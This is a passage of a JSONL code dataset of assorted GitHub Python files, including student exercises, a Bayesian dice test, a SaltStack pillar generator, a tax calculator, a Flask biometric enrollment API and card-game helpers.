rows)\n","repo_name":"PaulineMalova/Loan-Data","sub_path":"mysql/loans.py","file_name":"loans.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7459912309","text":"import logging\nimport os\nimport unittest\nfrom typing import Callable\n\nimport probaspace\nimport bayes\n\n\ndef dice(count_side: int) -> Callable[[probaspace.Event], float]:\n def likelihood(event: probaspace.Event):\n if int(event.name) > count_side:\n return 0.\n else:\n return 1. / float(count_side)\n\n return likelihood\n\n\nclass ProbaspaceTest(unittest.TestCase):\n\n def test_dice(self):\n estimator = bayes.BayesAnalysis()\n #\n # estimator.create_hypothesis(Hypothesis(\"Smarties 94\", smarties94), 0.5)\n # estimator.create_hypothesis(Hypothesis(\"Smarties 96\", smarties96), 0.5)\n # estimator.add_event('R')\n # estimator.add_event('G')\n sides = probaspace.Universe.from_labels('1', '2', '3', '4', '5', '6')\n d4 = sides.create_random_variable_single(\"Dice 4\", likelihood=dice(4))\n d6 = sides.create_random_variable_single(\"Dice 6\", likelihood=dice(6))\n d8 = sides.create_random_variable_single(\"Dice 8\", likelihood=dice(8))\n d12 = sides.create_random_variable_single(\"Dice 12\", likelihood=dice(12))\n d20 = sides.create_random_variable_single(\"Dice 20\", likelihood=dice(20))\n\n estimator.define_uninformed(sides, d4, d6, d8, d12, d20)\n\n estimator.add_event(probaspace.Event('3'))\n estimator.add_event(probaspace.Event('4'))\n estimator.add_event(probaspace.Event('8'))\n estimator.add_event(probaspace.Event('3'))\n estimator.add_event(probaspace.Event('1'))\n self.assertAlmostEqual(estimator.evaluate(d12), 0.11532016915)\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO, format='%(asctime)s:%(name)s:%(levelname)s:%(message)s')\n file_handler = logging.FileHandler('{}.log'.format(os.path.basename(__file__).split('.')[0]), mode='w')\n formatter = logging.Formatter('%(asctime)s:%(name)s:%(levelname)s:%(message)s')\n file_handler.setFormatter(formatter)\n logging.getLogger().addHandler(file_handler)\n unittest.main()\n","repo_name":"webclinic017/BayesAnalysis","sub_path":"tests/test_probaspace.py","file_name":"test_probaspace.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18286253086","text":"#!/usr/bin/env python\n# coding=utf8\n# Filename: node.py\n\n\nimport os\nimport yaml\n\n#定义/srv/pillar/top.sls文件\npillar_top_conf = open('/srv/pillar/test/top.sls', 'w+')\n'''\n#打开pillar_node_conf.txt,此文件为节点信息配置文件,注意必须为标准的yaml格式, 如\nweb-ns-vm-10-10-10-30-huzhou.kx1d.com:\n server: 1000\n number: 1001\n money: 1002\n'''\nPillarNodeConf = open('pillar_node_conf.txt', 'r')\nPillarNodeFile = yaml.load(PillarNodeConf)\n#用for循环生成top.sls和节点pillar文件\nfor i in range(0,len(PillarNodeFile)):\n #取出自动的key值,即主机名\n key=PillarNodeFile.keys()[i]\n #取出主机的values,即自定义的pillar变量\n values=PillarNodeFile[key]\n #将主机对应的pillar文件名修改为web_ns.10-10-10-30-huzhou.sls这种格式\n node_key=key.replace('\\n', '').replace('-ns','_ns').replace('-vm-','.').replace('-py-','.').replace('.kx1d.com','')\n pillar_top_conf_info= \"'\"+key+\"':\\n\" + \" - \" + node_key + \"\\n\" \n '''\n shell#cat top.sls \n 'web-ns-vm-10-10-10-30-huzhou.kx1d.com':\n - web_ns.10-10-10-30-huzhou\n '''\n pillar_top_conf.write(pillar_top_conf_info)\n\n #定义文件名,例如web_ns.10-10-10-30-huzhou.sls\n node_pillar_sls=node_key+\".sls\"\n '''\n #往node节点里面定义pillar变量, web_ns.10-10-10-30-huzhou.sls \n server: 1000\n number: 1001\n money: 1002\n '''\n pillar_node_file = open(node_pillar_sls, 'a')\n for i in range(0,len(values)):\n serverkey = values.keys()[i]\n servervalues = values[serverkey]\n pillar_node_file_info= serverkey+\": \"+str(servervalues) + \"\\n\"\n pillar_node_file.write(pillar_node_file_info)\n\n PillarNodeConf.close()\n pillar_node_file.close()\n","repo_name":"kuangling/Python","sub_path":"node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6957649103","text":"import sys\r\n\r\ndef roman(n):\r\n return \"V\"\r\n\r\ndef assertEqual(first, second, msg=\"\"):\r\n if first != second:\r\n msg += \"\\n{0!r} != {1!r}\".format(first, second)\r\n raise AssertionError(msg)\r\n\r\ndef test_roman():\r\n assertEqual(roman(5), \"V\")\r\n\r\n print(\"All tests passed successfully.\")\r\n\r\nscript_name = sys.argv[0]\r\narguments = sys.argv[1:]\r\n\r\nUSAGE = \"Usage: {0} \".format(script_name)\r\n\r\nif len(arguments) == 0 or len(arguments) > 1:\r\n print(USAGE)\r\nelif arguments[0] == \"test\":\r\n test_roman()\r\nelse:\r\n number = int(arguments[0])\r\n print(roman(number))\r\n","repo_name":"marthinajonsson/pythonCourse","sub_path":"python_160615/08-roman-numerals.py","file_name":"08-roman-numerals.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27285427650","text":"import random\n\nprint(\"Hello! What is your name?\")\nname=input()\nrand1=random.randint(1,20)\nprint(f\"Well, {name}, I am thinking of a number between 1 and 20.\")\nans = int(100)\nguess = 1\nwhile ans != rand1:\n print(\"Take a guess\")\n ans=int(input())\n if ans > rand1:\n print(\"Your guess is too high.\")\n guess += 1\n elif ans < rand1:\n print(\"Your guess is too low\")\n guess += 1\n elif ans == rand1:\n print(f\"Good job, {name} You guessed my number in {guess} guesses!\")","repo_name":"Abukhanifa/pp2","sub_path":"lab3/functions1/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11948919752","text":"import sys\n\nif __name__ == '__main__':\n N = int(input())\n arr = [[] for _ in range(4)]\n\n for _ in range(N):\n a, b, c, d = map(int, sys.stdin.readline().split())\n arr[0].append(a); arr[1].append(b); arr[2].append(c); arr[3].append(d)\n ab_dic = dict()\n\n for a in arr[0]:\n for b in arr[1]:\n if a + b not in ab_dic:\n ab_dic[a + b] = 1\n else:\n ab_dic[a + b] += 1\n ans = 0\n for c in arr[2]:\n for d in arr[3]:\n if -(c + d) in ab_dic:\n ans += ab_dic[-(c + d)]\n print(ans)","repo_name":"Team-NTO/NTO","sub_path":"HyeonJinGithub/2021-03-15/7453 합이 0인 네 정수.py","file_name":"7453 합이 0인 네 정수.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"15343699748","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nimport examples as exa\nimport scipy.integrate as si\nfrom plot_ex import plot_order, plot_contourn, eval_fun\nfrom integrators import HBr\nplt.rcParams['font.size'] = 20\n\nmethods = ['RB', 'RB_adap', 'EB', 'EB_adap']\n\n\n\ndef fig_comp(ex, dt, c, steps, save):\n C = 0.1 # C = 2.302585093\n m = 0.01\n v = 1000\n mu = 0.8\n steps = 20000\n\n p0_t = -HBr(ex, ex.x0, ex.p0, ex.x0_t, c)\n init = [ex.x0, ex.x0_t, ex.p0, p0_t]\n plt.figure(figsize=(8, 6))\n\n fsol_RB = eval_fun('RB', params=[v, m, c, C, mu], dt=dt, steps=steps, ex=ex, init=init)\n fsol_EB = eval_fun('EB', params=[v, m, c, C, mu], dt=dt, steps=steps, ex=ex, init=init)\n\n plt.semilogy(fsol_RB, label='RB', linewidth=2, color='k', marker='h', fillstyle='none', markevery=int(steps / 15),\n markersize=12)\n plt.semilogy(fsol_EB, label='EB', linewidth=2, color='blue',ls='dashed', marker='h', fillstyle='none', markevery=int(steps / 15),\n markersize=12)\n\n plt.legend(loc='upper right')\n plt.xlabel('Iteration')\n plt.ylabel('Function value')\n plt.legend(loc=3)\n plt.tight_layout()\n if save:\n plt.savefig('ex_Quaartic' + '.png')\n\ndef orderf(fsol, ite):\n return np.log10(fsol[ite]) / np.log10(ite -1)\n\n\n\ndef plot_comp_order(ex, dt,steps, func, save):\n C =1\n m=0.01; v=1000; mu=0.8\n\n c=2\n p0_t = -HBr(ex, ex.x0, ex.p0, ex.x0_t, c)\n init =[ex.x0, ex.x0_t, ex.p0, p0_t]\n\n colors = ['b', 'r']\n styles = ['-', '--', '-.']\n marker=['<','H','d']\n order=[2,4,8]\n methods=['RB','EB']\n fig, ax = plt.subplots(figsize=(8,6))\n ite=1500\n tt=np.linspace(ite,steps,steps-ite+1)\n\n\n for cc, col in enumerate(colors):\n for ss, sty in enumerate(styles):\n fsol_RB = eval_fun(methods[cc], params=[v, m, order[ss], C, mu], dt=dt, steps=steps, ex=ex, init=init)\n ax.semilogy(fsol_RB, linewidth=2, color=colors[cc], ls=styles[ss])\n #order_num1 = np.log10(fsol_RB[-5000]) / np.log10(steps -1-5000)\n #order_num = [orderf(fsol_RB, 4000), orderf(fsol_RB, 8000),orderf(fsol_RB, steps-1)] #quadratic\n order_num = [orderf(fsol_RB, 1000), orderf(fsol_RB, 2000), orderf(fsol_RB, steps - 1)] #quartic\n print(methods[cc],order[ss], order_num)\n #ax.loglog(tt, tt**(order_num), '-m')\n #ax.semilogy(fsol_RB, linewidth=2, color=colors[cc], marker=marker[ss], fillstyle='none', markevery=int(steps / 15), markersize=12) # ls=styles[ss]\n\n for cc, col in enumerate(colors):\n ax.plot(np.NaN, np.NaN, c=colors[cc], linewidth=2, label=methods[cc])\n\n ax2 = ax.twinx()\n for ss, sty in enumerate(styles):\n #ax2.plot(np.NaN, np.NaN, marker=marker[ss],label=str(order[ss]), fillstyle='none', markevery=int(steps / 15), markersize=12, c='black')\n ax2.plot(np.NaN, np.NaN, ls=styles[ss], linewidth=2, label=str(order[ss]), c='black')\n ax2.get_yaxis().set_visible(False)\n\n ax.legend(loc=1)\n ax2.legend(title='Order',loc=3)\n\n plt.show()\n plt.tight_layout()\n if save:\n plt.savefig('figures/ex_comp_'+func + '.png')\n\n#ex=exa.Ex_Quartic_1(n=10)\n#plot_comp_order(ex, dt=1e-3,steps=4000, func='Quartic', save=True)\n#plot_contourn(ex, xmin=-10, xmax=10, ymin=-10, ymax=10, num_ex='Quartic',save=True)\n\nex = exa.Ex_Quadratic(n=100)\nplot_comp_order(ex, dt=1e-4, steps=4000, func='Quadratic', save=True)\nplot_contourn(ex, xmin=-10, xmax=10, ymin=-10, ymax=10, num_ex='Quadratic',save=True)\n\n\"\"\"\nex = exa.Ex_Quadratic(n=100)\nplot_comp_order(ex, dt=1e-4, steps=10000, func='Quadratic', save=True)\nplot_contourn(ex, xmin=-10, xmax=10, ymin=-10, ymax=10, num_ex='Quadratic',save=True)\n\n\nex = exa.Ex_Corr_Quadratic(n=50)\nplot_comp_order(ex, dt=1e-4, steps=10000, func='Corr_Quadratic', save=True)\nplot_contourn(ex, xmin=-10, xmax=10, ymin=-10, ymax=10, num_ex='Corr_Quadratic',save=True)\n\nex=exa.Ex_Quartic_1(n=10)\nplot_comp_order(ex, dt=1e-3,steps=4000, func='Quartic', save=True)\nplot_contourn(ex, xmin=-10, xmax=10, ymin=-10, ymax=10, num_ex='Quartic',save=True)\n\"\"\"\n\n\n\n\n#ex = exa.Ex_Schwefel(n=20)\n#plot_comp_order(ex, dt=1e-3, steps=50000, func='Quartic', save=True)\n#ex = exa.Ex_Three_hump()\n#plot_comp_order(ex, dt=1e-5, steps=10000, func='Three hump', save=True)\n\n","repo_name":"mdazatorres/Breg_dynamic_contact_algorithm","sub_path":"benchmark examples/plot_article_exs.py","file_name":"plot_article_exs.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14383698006","text":"# -*- coding: utf-8 -*-\n\"\"\"Application configuration.\n\nMost configuration is set via environment variables.\n\nFor local development, use a .env file to set\nenvironment variables.\n\"\"\"\nfrom environs import Env\n\nenv = Env()\nenv.read_env()\n\nENV = env.str(\"FLASK_ENV\", default=\"production\")\nDEBUG = ENV == \"development\"\nSQLALCHEMY_DATABASE_URI = env.str(\"DATABASE_URL\")\nSECRET_KEY = env.str(\"SECRET_KEY\")\nSEND_FILE_MAX_AGE_DEFAULT = env.int(\"SEND_FILE_MAX_AGE_DEFAULT\")\nBCRYPT_LOG_ROUNDS = env.int(\"BCRYPT_LOG_ROUNDS\", default=13)\nDEBUG_TB_ENABLED = DEBUG\nDEBUG_TB_INTERCEPT_REDIRECTS = False\nCACHE_TYPE = \"simple\" # Can be \"memcached\", \"redis\", etc.\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n\nALLOWED_EXTENSIONS_FILES = set(['png', 'jpg', 'jpeg', 'gif','xls','xlsx'])\n\nUPLOADED_PATH = 'data/uploads/'\nSTUDENTS_IMG = 'data/students_img/'\n\n# 短信验证码\nSMS_KEY = env.str(\"SMS_KEY\")\nSMS_CODE_URL = env.str(\"SMS_CODE_URL\")\nSMS_CODE_TPLID = env.str(\"SMS_CODE_TPLID\")\n","repo_name":"anaf007/single_school","sub_path":"main/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23116123875","text":"import sys\r\nimport heapq\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\ngraph = [[] for _ in range(n + 1)]\r\n\r\nfor i in range(m):\r\n a, b, c = map(int, input().split())\r\n graph[a].append((b, c))\r\n graph[b].append((a, c))\r\n\r\nd = [[0] * n for i in range(n)]\r\nfor i in range(1, n + 1):\r\n heap = []\r\n distance = [sys.maxsize for _ in range(n + 1)]\r\n heapq.heappush(heap, (0, i))\r\n\r\n while heap:\r\n cost, num = heapq.heappop(heap)\r\n if distance[num] < cost:\r\n continue\r\n\r\n for nnum, ncost in graph[num]:\r\n if distance[nnum] > ncost + cost:\r\n distance[nnum] = ncost + cost\r\n d[nnum - 1][i - 1] = num\r\n heapq.heappush(heap, (ncost + cost, nnum))\r\n\r\nfor i in range(n):\r\n for j in range(n):\r\n if i == j:\r\n print('-', end=' ')\r\n else:\r\n print(d[i][j], end=' ')\r\n print()","repo_name":"ShinJongUng/BOJ-baekjoon-Algorithm","sub_path":"백준/Gold/1719. 택배/택배.py","file_name":"택배.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6415019612","text":"#!/usr/bin/env python3\n\nimport sys\nimport csv\n\n\nclass Args(object):\n\n\tdef __init__(self):\n\t\tself.args = sys.argv[1:]\n\t\tself.indexc = self.args.index('-c')\n\t\tself.indexd = self.args.index('-d')\n\t\tself.indexo = self.args.index('-o')\n\t\tself.configpath = self.args[self.indexc+1]\n\t\tself.userpath = self.args[self.indexd+1]\n\t\tself.gongzipath = self.args[self.indexo+1]\n\nclass Config(object):\n\n\tdef __init__(self):\n\t\tself.config = self._read_config()\n\n\tdef _read_config(self):\n\t\tconfig = {}\n\t\twith open(challenge3.configpath, 'r') as configfile:\n\t\t\tfor lines in configfile:\n\t\t\t\tself.a = configfile.readline()\n\t\t\t\tself.a0 = self.a.split('=')[0].strip()\n\t\t\t\tself.a1 = self.a.split('=')[1].strip()\n\t\t\t\tconfig[self.a0] = self.a1\n\n\t\treturn config\nclass UserData(object):\n\n\tdef __init__(self):\n\t\tself.userdata = self._read_users_data()\n\n\tdef _read_users_data(self):\n\t\tuserdata = {}\n\t\twith open(challenge3.userpath, 'r') as userdatafile:\n\t\t\tfor lines in userdatafile:\n\t\t\t\tself.a = userdatafile.readline()\n\t\t\t\tself.a0 = self.a.split(',')[0].strip()\n\t\t\t\tself.a1 = self.a.split(',')[1].strip()\n\t\t\t\tuserdata[self.a0] = self.a1\n\t\treturn userdata\nclass IncomeTaxCalculator(object):\n\tdef __init__(self):\n\t\tself.rate = 0\n\t\tfor key in Config.config.keys():\n\t\t\tif key == 'JiShuL' or key == 'JiShuH':\n\t\t\t\tself.rate = self.rate\n\t\t\telse:\n\t\t\t\tself.rate += float(Config.config[key])\n\t\ttax = {}\n\t\twith open(challenge3.userpath, 'r') as userfile:\n\t\t\tfor line in userfile:\n\t\t\t\ta = userfile.readline()\n\t\t\t\ta0 = a.split(',')[0].strip()\n\t\t\t\ta1 = float(a.split(',')[1].strip())\n\t\t\t\tYing = a1 - self.rate * a1 - 3500\n\t\t\t\tif Ying <= 1500:\n\t\t\t\t\ttax[a0] = (a1 - self.rate * a1 - 3500) * 0.03 - 0\n\t\t\t\telif Ying > 1500 and a1 <= 4500:\n\t\t\t\t\ttax[a0] = (a1 - self.rate * a1 - 3500) * 0.10 - 105\n\t\t\t\telif Ying > 4500 and a1 <= 9000:\n\t\t\t\t\ttax[a0] = (a1 - self.rate * a1 - 3500) * 0.20 - 555\n\t\t\t\telif Ying > 9000 and a1 <= 35000:\n\t\t\t\t\ttax[a0] = (a1 - self.rate * a1 - 3500) * 0.25 - 1005\n\t\t\t\telif Ying > 35000 and a1 <= 55000:\n\t\t\t\t\ttax[a0] = (a1 - self.rate * a1 - 3500) * 0.30 - 2755\n\t\t\t\telif Ying > 55000 and a1 <= 80000:\n\t\t\t\t\ttax[a0] = (a1 - self.rate * a1 - 3500) * 0.35 - 5505\n\t\t\t\telse:\n\t\t\t\t\ttax[a0] = (a1 - self.rate * a1 - 3500) * 0.45 - 13505\n\t\t\t\tif tax[a0] < 0:\n\t\t\t\t\ttax[a0] = 0\n\t\tself.tax = tax\n\n\t\tshebao = {}\n\t\tgongzi = {}\n\t\twith open(challenge3.userpath, 'r') as userfile:\n\t\t\tfor line in userfile:\n\t\t\t\ta = userfile.readline()\n\t\t\t\ta0 = a.split(',')[0].strip()\n\t\t\t\ta1 = float(a.split(',')[1].strip())\n\t\t\t\tshebao[a0] = a1 * self.rate\n\t\t\t\tgongzi[a0] = a1 - self.tax[a0] - shebao[a0]\n\n\t\tself.shebao = shebao\n\t\tself.gongzi = gongzi\n\n\t\tresult = []\n\t\twith open(challenge3.userpath, 'r') as userfile:\n\t\t\tfor line in userfile:\n\t\t\t\ta = userfile.readline()\n\t\t\t\ta0 = a.split(',')[0].strip()\n\t\t\t\ta1 = float(a.split(',')[1].strip())\n\t\t\t\tusernum = a0\n\t\t\t\tpresalary = format(a1, \".2f\")\n\t\t\t\tbaojin = format(self.shebao[usernum], \".2f\")\n\t\t\t\tshui = format(self.tax[usernum], \".2f\")\n\t\t\t\taftersalary = format(self.gongzi[usernum], \".2f\")\n\t\t\t\tresult.append([usernum,presalary,baojin,shui,aftersalary])\n\t\tself.result = result\n\t\t# return self.result\n\tdef export(self, default='csv'):\n\t\tresult = self.result\n\t\twith open(challenge3.gongzipath, 'w') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerows(result)\n\n\t\t\nif __name__ == '__main__':\n\n\tchallenge3 = Args()\n\tConfig = Config()\n\tUserData = UserData()\n\tIncomeTaxCalculator = IncomeTaxCalculator()\n\tprint(Config.config)\n\tprint(UserData.userdata)\n\t# print(IncomeTaxCalculator.rate)\n\tprint(Config.config.keys())\t#gonghao 1 2\n\tprint(IncomeTaxCalculator.tax)\t#shui 4\n\tprint(IncomeTaxCalculator.shebao)\t#shebao 3\n\tprint(IncomeTaxCalculator.gongzi)\n\tprint(IncomeTaxCalculator.result)\n\tIncomeTaxCalculator.export()\n\n","repo_name":"ltd0215/CodeOfChallenge","sub_path":"calculator3.py","file_name":"calculator3.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70638088854","text":"# ** Guess the number\r\n# ** Task description:\r\n'''\r\nThe daily life of Shri Ram in Gurukul includes Education sessions from the Guru, Sparring to increase experience in Sastra-Vidya and Strict meals in between. Sometimes though, Sree Ram gets free time and this happened to be one such time. While enjoying one such free time with his friends, one of his friends suggested Shri Ram and the others play a game he had recently learned.\r\nMake that game so that Shri Ram and his friends can enjoy it.\r\n\r\n'''\r\n\r\n# ** Task details:\r\n'''\r\nCreate a “Guess the Number” game on Python.\r\nWhen the game starts, it will prompt the user to enter the name of the player and the range (both upper and lower limit) of the number within which the user will have to guess.\r\nFollowing this, the game will generate a random number under the range and prompt the user to insert their guess.\r\nNow, the guess is checked with the original number and the user will be informed if their guess was “Too High” or “Too Low”.\r\nThe users will be appointed 100 points at the start of the Game.\r\nIf they get the guess wrong, a total of 5 points will be deducted from the user's Total Points.\r\nThese points need to be tracked till the end of the number of rounds that the user entered when the game started and will be shown to the user during and at the end of the game.\r\nThe game ends if the user gets the correct guess for the number or if they run out of points.\r\n'''\r\n\r\nimport random\r\n\r\nprint(\"please enter your name to start the Guess the Number game: \")\r\nstring = input()\r\nprint(\"hello, \" + string + \" let's start the game\")\r\nprint(\"enter the range so that we can start the game: \")\r\nvar1 = int(input(\"enter the first number: \"))\r\nvar2 = int(input(\"enter the second number: \"))\r\n\r\nn = random.randrange(var1,var2)\r\ncount = 100\r\nprint(\"ok, so now that you have entered the range you can start guessing: \")\r\n\r\nwhile(count > 0):\r\n guess = int(input(\"enter the number: \"))\r\n if(guess == n):\r\n print(\"hurray, you guessed the number right\")\r\n break;\r\n else:\r\n if(guess < n):\r\n print(\"Too low\")\r\n count-=5\r\n else:\r\n print(\"Too high\")\r\n count-=5\r\n\r\nif(count <= 0):\r\n print(\"sorry, you can't play further as you dont have points left to further go in this game\") ","repo_name":"santr4/C3-Task","sub_path":"EASY/Task_1.py","file_name":"Task_1.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"14524446874","text":"from flask import Flask, jsonify, request, abort\nimport json\nfrom utils import add_datapoint, get_user_from_finger, check_email_exist, delete_email, reset_database, get_alldata\n\napplication = Flask(__name__)\n\n@application.route('/')\ndef homepage():\n return \"RESTFUL API for FingerVein Running ver-003\"\n\n@application.route('/enroll', methods=['POST'])\ndef enroll():\n if not request.json or \"first\" not in request.json \\\n or \"last\" not in request.json \\\n or \"email\" not in request.json \\\n or \"fingertemplate\" not in request.json \\\n or \"fingerverificationtemplate\" not in request.json:\n return jsonify({\"statuscode\" : 400,\n \"description\" : \"No / Incomplete data given for enrollment\"}), 400\n \n new_user = {\n \"first\" : request.json[\"first\"],\n \"last\" : request.json[\"last\"],\n \"email\" : request.json[\"email\"],\n \"fingertemplate\" : request.json[\"fingertemplate\"],\n \"fingerverificationtemplate\" : request.json[\"fingerverificationtemplate\"]\n }\n if not add_datapoint(new_user):\n return jsonify({\"statuscode\" : -1,\n \"description\" : \"User already exists\"}), 200\n return jsonify({\"statuscode\" : 0,\n \"description\" : \"User successfully added\"}), 200\n\n@application.route('/authenticate', methods=['POST'])\ndef authentication():\n if not request.json or \"fingertemplate\" not in request.json:\n return jsonify({\"statuscode\" : 400,\n \"description\" : \"No finger template provided\"}), 400\n \n fingercode = request.json[\"fingertemplate\"]\n response, responsedata = get_user_from_finger(fingercode)\n if response == -1:\n return jsonify({\"statuscode\" : -1,\n \"description\" : \"Finger template not authenticated\"}), 200\n return jsonify({\"statuscode\" : 0,\n \"description\" : \"User authenticated\",\n \"data\" : responsedata}), 200\n\n@application.route('/checkexists', methods=['POST'])\ndef checkexists():\n if not request.json or \"email\" not in request.json:\n return jsonify({\"statuscode\" : 400,\n \"description\" : \"No email provided\"}), 400\n\n email = request.json[\"email\"]\n response = check_email_exist(email)\n if response:\n return jsonify({\"statuscode\" : 0,\n \"description\" : \"User with this email exists\"}), 200\n return jsonify({\"statuscode\" : -1,\n \"description\" : \"User with this email does not exist\"}), 200\n\n@application.route('/delete', methods=['POST'])\ndef delete():\n if not request.json or \"email\" not in request.json:\n return jsonify({\"statuscode\" : 400,\n \"description\" : \"No email provided\"}), 400\n\n email = request.json[\"email\"]\n response = delete_email(email)\n if response:\n return jsonify({\"statuscode\" : 0,\n \"description\" : str(response) + \" record(s) deleted\"}), 200\n return jsonify({\"statuscode\" : -1,\n \"description\" : \"No entry found with the given email\"}), 200\n\n@application.route('/reset', methods=['GET'])\ndef reset():\n response = reset_database()\n return jsonify({\"statuscode\" : 0,\n \"description\" : str(response) + \" (ALL) record(s) deleted\"}), 200\n\n@application.route('/returndata', methods=['GET'])\ndef returndata():\n data = get_alldata()\n return jsonify({\"statuscode\" : 0,\n \"description\" : \"All data returned\",\n \"data\" : data}), 200\n\nif __name__ == '__main__':\n application.run(host=\"0.0.0.0\", port=80)","repo_name":"prasang-gupta/FingerveinScannerApp","sub_path":"api/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12904155028","text":"# Imports\nimport random\nfrom les_meves_funcions.funcions_consultesDB import *\nimport les_meves_funcions.funcions_menu\n\n\ndef new_name():\n while True:\n name = input(\"Name: \")\n try:\n if name == \"\":\n raise ValueError(\"Name cannot be empty\")\n elif not name.isalnum():\n raise ValueError(\"Name must be letters or numbers only\")\n except ValueError as error:\n print(error)\n else:\n break\n return name\n\n\ndef new_nif(human):\n # Comprobación del número del DNI al crear un nuevo jugador\n resultado = SelectBBDD(\"Select player_id from player\")\n exist_id = []\n for i in range(len(resultado)):\n exist_id.append(resultado[i][0])\n while True:\n if human:\n dni = input(\"Enter NIF: \")\n # Comprobamos que introduce 9 caracteres.\n try:\n if not len(dni) == 9:\n raise ValueError(\"Incorrect lenght.\")\n # Debe estar compuesto de 8 números y 1 letra.\n elif not dni[:8].isdigit() or not dni[8].isalpha():\n raise ValueError(\"Incorrect format.\")\n # Comprobación de que ha introducido la letra correspondiente.\n elif not letrasDni[int(dni[:8]) % 23] == dni[8].upper():\n raise ValueError(\"Incorrect letter.\")\n # Miramos si el DNI ya esta registrado en otro cliente.\n elif dni.upper() in exist_id:\n raise ValueError(\"ID: {} already exists\".format(dni))\n else:\n break\n except ValueError as error:\n print(error)\n except IndexError:\n print(\"Incorrect format.\")\n else:\n dni = \"\"\n for i in range(1, 9):\n dni += str(random.randint(1, 9))\n dni = dni + letrasDni[random.randrange(0, len(letrasDni))]\n break\n return dni.upper()\n\n\ndef player_profile():\n profile = menuSelectType()\n return profile\n\n\ndef save_player(name, dni, profile, human_bool):\n if profile == 30:\n name_prof = \"Cautious\"\n elif profile == 40:\n name_prof = \"Moderated\"\n elif profile == 50:\n name_prof = \"Bold\"\n print(\"*\" * 95 + \"\\n\" + figlet_format(\" \" * 24 + \"New Player\", font=\"doom\") + \"*\" * 95 + \"\\n\\n\" +\n \"Name: \" + name + \"\\n\" + \"DNI: \" + dni + \"\\n\" + \"Profile: \" + name_prof + \"\\n\")\n while True:\n save = input(\"Save player? Y/N: \")\n if save.upper() == \"Y\":\n return True\n elif save.upper() == \"N\":\n print(\"Player discarded.\")\n return False\n else:\n print(\"Incorrect option.\")\n\n\ndef menuSelectType():\n while True:\n opt = les_meves_funcions.funcions_menu.getOpt(menus[\"menuSelectType\"][\"header\"],\n menus[\"menuSelectType\"][\"textOpts\"],\n menus[\"menuSelectType\"][\"inputOptText\"],\n menus[\"menuSelectType\"][\"rangeList\"], {}, [])\n if opt == 1:\n profile = 30\n return profile\n if opt == 2:\n profile = 40\n return profile\n if opt == 3:\n profile = 50\n return profile\n else:\n break\n\n\ndef newPlayer_human():\n print(\"*\" * 95 + \"\\n\" +\n figlet_format(\" \" * 24 + \"New Player\", font=\"doom\") +\n \"*\" * 95 + \"\\n\")\n name = new_name()\n dni = new_nif(1)\n print(\"\\n\", \"*\"*95, \"\\nNombre: \", name, \"\\nDNI: \", dni)\n profile = player_profile()\n save = save_player(name, dni, profile, 1)\n if save:\n query = \"INSERT INTO player VALUES ('{}','{}',{},{})\".format(dni, name, profile, 1)\n InputBBDD(query)\n print(\"Player saved\")\n else:\n return\n\n\ndef newPlayer_boot():\n print(\"*\" * 95 + \"\\n\" +\n figlet_format(\" \" * 24 + \"New Player\", font=\"doom\") +\n \"*\" * 95 + \"\\n\")\n name = new_name()\n dni = new_nif(0)\n print(\"\\n\", \"*\"*95, \"\\nNombre: \", name, \"\\nDNI: \", dni)\n profile = player_profile()\n save = save_player(name, dni, profile, 0)\n if save:\n query = \"INSERT INTO player VALUES ('{}','{}',{},{})\".format(dni, name, profile, 0)\n InputBBDD(query)\n print(\"Player saved\")\n else:\n return\n","repo_name":"IFurio/Proyecto1-Siete-y-medio---Geanfranco-David-Isaac","sub_path":"les_meves_funcions/funcions_generals.py","file_name":"funcions_generals.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33868027116","text":"from pyspark.sql import DataFrame, SparkSession\n\nfrom pyspark.sql.functions import col, count, expr, lit, regexp_replace, trim, upper, when\n\nfrom src.dao import dao\nfrom src.utils import constants, utils\n\n\nclass PublicationService(object):\n \"\"\"\n Finds the name fo one or serveral newpapers from the json produced by the data pipeline\n that mention the most different drugs.\n :param pyspark.sql session\n :param drug inputfile path\n :param clinical trial inputfile path\n :param pubmed csv inputfile path\n :param pubmed json inputfile path\n :param output path\n \"\"\"\n\n def __init__(\n self,\n spark: SparkSession,\n drug_path: str,\n clinical_trial_path: str,\n pubmed_csv_path: str,\n pubmed_json_path: str,\n output_path: str,\n ):\n self.spark = spark\n self.drug_path = drug_path\n self.clinical_trial_path = clinical_trial_path\n self.pubmec_csv_path = 